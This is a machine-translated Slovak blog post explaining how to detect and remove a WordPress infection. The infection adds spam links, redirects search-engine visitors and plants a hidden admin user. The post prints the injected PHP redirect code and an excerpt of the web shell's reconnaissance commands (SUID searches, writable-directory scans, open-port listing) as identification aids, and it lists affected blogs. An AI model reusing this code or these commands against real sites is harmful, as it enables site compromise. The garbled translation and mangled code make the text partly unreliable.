Vírus blogosfére ... ale ja som mal, že ?!

V poslednom mesiaci, som dostal varovanie vírus v blogu z niektorých návštevníkov. Pôvodne som ignoroval varovanie, pretože som nainštaloval docela dobrý antivírusový program (Kaspersky AV 2009) A aj blog na dlhú dobu, nikdy som dostal vírus alert (dávno .. Videl som niečo podozrivého, že prvý obnovovací zmizol. Konečne ...).
Pomaly začali prejavovať veľké rozdiely návštevnostiPo ktorá nedávno plynule znížila návštevnosť a začal byť stále viac a viac ľudí mi povedať, že stealthsettings.com to je nakazené vírusmi. Včera som dostal od niekoho screenshot urobiť, keď antivírus zablokovanie scenár na stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bolo to dosť presvedčivé na mňa, tak som dal všetky zdroje prehľadávané. Prvá myšlienka, ktorá ma napadla, bola k tomu upgrade posledný WordPress (2.5.1), ale nie skôr, než staré skript odstrániť všetky súbory WordPress a aby zálohovanie databázy, Tento postup nepriniesol žiadne výsledky a pravdepodobne by trvalo dlhý čas na to, aby povedal, kde je buba, ak by to nepovedal v diskusii nad kávou, našiel Google a že by bolo dobré ho vidieť.
MyDigitalLife.info publikoval článok s názvom "WordPress Hack: Recover a Fix Google a vyhľadávače, alebo žiadny súbor cookie prevádzku presmerovaný na Váš-Needs.info, AnyResults.Net, Golden-Info.net a ďalších nelegálnych stránok"To je koniec nite som potreboval.
Je to o využiť WordPress na základe súboru cookieČo myslím, že je veľmi zložité a urobil knihu. Natoľko šikovný, aby sa SQL Injection Databáza blog, vytvoriť neviditeľný užívateľa jednoduché rutinné kontrola Informačný panel->užívatelia, Skontrolujte server adresáre a súbory "nahrávacie" (S chmod 777), aby hľadal a vykonať Súbory s oprávneniami skupiny alebo koreň. Ja neviem, kto zneužiť meno a vidieť, že existuje len málo napísané články o ňom, a to napriek skutočnosti, že mnoho blogov sú infikované, vrátane Rumunska. Ok ... Budem sa snažiť, aby sa pokúsili vysvetliť univerzálnosti o vírusu.

Čo je to vírus?

Najprv vložte zdroje stránky na blogy, odkazy neviditeľné pre návštevníkov, ale viditeľný a doštičkové pre vyhľadávače, najmä Google. Takto prevod stránky Page Rank uvedené útočníkom, Po druhé, jeden je vložený Presmerovanie kód URL pre návštevníkov z Google, Live, Yahoo, ... alebo RSS čítačka a nie miesto v sušienka, antivírus detekuje presmerovanie as Trojan-Clicker.HTML.

Príznaky:

Znížená masívne návštevnostiNajmä na blogy, kde väčšina návštevníkov prichádza z Google.

Identifikácia: (Teda komplikovať problém pre tých, ktorí nevedia, ako, ako phpmyadmin, php a linux)

LA. VAROVANIE! Najprv vytvoriť záložnú databázu!

1. Skontrolujte zdrojové súbory index.php, header.php, footer.php, Téma tohto blogu a uvidíme, či tam je kód, ktorý používa šifrovanie base64 alebo obsahuje "if ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "forma:

<? Php
$ Seref = array ("satelitné", "msn", "živý", "AltaVista"
"Opýtajte sa", "Yahoo", "AOL", "CNN", "počasie", "Alexa");
$ Ser = 0; foreach ($ Seref as $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == false) {$ ser = "1,? Break;}!
if ($ ser == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); exit;
}>

... Alebo tak niečo. Zmazať tento kód!

Kliknite na obrázok ...

Kód index

Na obrázku vyššie som omylom zvolili "<PHP get_header ();?>". Tento kód by mal zostať.

2. Použitie phpMyAdmin a ísť do databázovej tabuľky wp_usersTam, kde kontrola nie je užívateľské meno vytvorené na 00:00:00 0000-00-00 (Možno v oblasti user_login napísať "WordPress". Poznámka: ID užívateľa (pole ID) a potom ho odstráňte.

Kliknite na obrázok ...

Fake užívateľa

* Zelená linka by mala byť odstránená, a udržal si ID. V prípade Bol ID = 8 .

3. Prejsť na tabuľky wp_usermeta, Kde sa nachádza a utrieť linky pre ID (ak pole USER_ID ID hodnota je odstránený).

4. V tabuľke wp_optionChoď active_plugins a uvidíte, čo plugin je povolené podozrivého. To môže byť použitý ako zakončenie _old.giff, _old.pngg, _old.jpeg, _new.php.giff, atď. kombinácie falošných rozšírení obrázkov s _old a _new.

KDE SELECT * FROM wp_options option_name = 'active_plugins'

Odstrániť tento plugin, potom prejdite na blogu -> Dashboard -> Plugins, a aktivovať plugin, ktorý zakázať určité.

Kliknite na obrázok pre zobrazenie je zdá active_plugins vírus súbor.

zapojiť

Sledujte cestu na FTP alebo SSH, je uvedené v active_plugins a zmazať súbor zo servera.

5. Aj v phpMyAdmin, v tabuľke wp_option, Nájsť a odstrániť riadok obsahujúci "rss_f541b3abd05e7962fcab37737f40fad8"A"internal_links_cache ".
V internal_links_cache, ponúkol šifrované spamu odkazy, ktoré sa zobrazujú v blogu Google Adsense kód, Hacker.

6. Odporúča sa, aby zmeniť heslo Blog a prihlásenie odobrať všetky podozrivé userele. Upgrade na najnovšiu verziu WordPress a nastavte blog neumožňuje registráciu nových užívateľov. Nedochádza k strate ... môžu komentovať a nelogické.

Snažil som sa vysvetliť, koľko, čo robiť v takejto situácii, aby ste vyčistili blog od tohto vírusu. Problém je oveľa horší, než sa zdá a nie je dokonca vyriešený, pretože sa používa bezpečnostné zraniteľnosti hosting webový server, ktorý je blog.

Ako prvé opatrenie bezpečnosti, s prístupom SSH, Urobiť nejaké kontroly na serveri, či sú súbory ako * _old * a * _New. * S koncovkami.GIFF,. Jpeg,. Pngg,. Jpgg. Tieto súbory musia byť odstránené. Ak premenujete súbor, napríklad. top_right_old.giff in top_right_old.phpVidíme, že súbor je presne kód zneužitie servera.

Niektoré užitočné tipy na kontrolu, čistenie a zabezpečenie servera. (cez SSH)

1. cd / tmp a skontrolujte, či sú k dispozícii adresáre ako tmpVFlma alebo iný kombinácia asemenatoare meno a odstrániť ju. Pozri obrázok nižšie, dve také zložky, ktoré sa mi:

tmpserver

rm-rf foldername

2. Skontrolujte elimiati (výmena chmod-mail) zložky s atribútmi ako je to možné chmod 777

nájsť všetky zapisovateľné súbory v aktuálnej dir: Nájsť. -Type f-perm-2-ls
nájsť všetky zapisovateľné adresára v aktuálnej dir: Nájsť. -Type d-perm-2-ls
nájsť všetky zapisovateľné adresáre a súbory v bežných dir: Nájsť. -Perm-2-ls

3. Hľadáte podozrivých súborov na serveri.

Nájsť. -Meno "* _new.php *"
Nájsť. -Meno "* _old.php *"
Nájsť. -Meno "*. Jpgg"
Nájsť. -Meno "* _giff"
Nájsť. -Meno "* _pngg"

4, VAROVANIE! súbory, ktoré si stanovili trochu Suid si SGID. Tieto súbory spustiť s právami užívateľa (skupina), alebo koreň, nie užívateľ, ktorý spustiť súbor. Tieto súbory môžu viesť k koreňovej kompromisu, ak sa jeho bezpečnostné problémy. Ak nechcete používať suid a SGID súbory s trochou, vykonajte "chmod 0 " je, alebo odinštalovať balíček obsahujúci im.

Exploit obsahuje niekde v zdroji ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Execute ("sysctl-n kern.ostype").;
$ Os = Execute ("sysctl-n kern.osrelease").;
$ Os = Execute ("sysctl-n kernel.ostype").;
$ Os = Execute ("sysctl-n kernel.osrelease").;
if (empty ($ user)) $ user = execute ('id');
$ Aliasy = array (
"=>"
"Nájsť user-súbory '=>' find /-type f-perm-04000-ls",
"Nájsť odoberanie súborov '=>' find /-type f-perm-02000-ls",
"Nájsť všetky zapisovateľné súbory v aktuálnej dir '=>' nájsť. -Type f-perm-2-ls ",
"Nájsť všetky zapisovateľné adresára v aktuálnej dir '=>' nájsť. -Type d-perm-2-ls ",
"Nájsť všetky zapisovateľné adresáre a súbory v bežných dir '=>' nájsť. -Perm-2-ls ",
"Ukáž otvoril porty '=>' netstat-| grep-i počúvať ',
);
Else {}
. $ Název_operačního_systému = Execute ("ver");
$ User = Execute ("echo% username%").;
$ Aliasy = array (
"=>"
"Zobraziť runing služby '=>' net start"
"Show proces list '=>' tasklist"
);
}

Zistí, že spôsob, ako ... v podstate narušenia bezpečnosti. Prístavy otvorte adresár "zápis" a skupinové spustenie výsady súborov / koreň.

Späť s viac ...

Niektoré infikované blogy: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... A zoznam pokračuje ... veľa.

Môžete skontrolovať, či blog je vírus, pomocou Google vyhľadávač. copy & paste:

Miesto: www.blegoo.com kúpiť

Dobrú noc a zvýšenie pracovať ;) Čoskoro prídem Eugene noviniek na prevezibil.imprevizibil.com.

BRB :)

TO: POZOR! WordPress tému zmeny alebo upgrade na WordPress 2.5.1, nie je riešením, ako sa zbaviť tohto vírusu.

Vírus blogosfére ... ale ja som mal, že ?!

O autorovi

tajnosť

Vášnivý o všetkom, čo znamená gadget a IT, píšem s potešením na stealthsettings.com od 2006 a rád s vami objavujem nové veci o počítačoch a MacOS, operačných systémoch Linux, Windows, iOS a Android.

Pridať komentár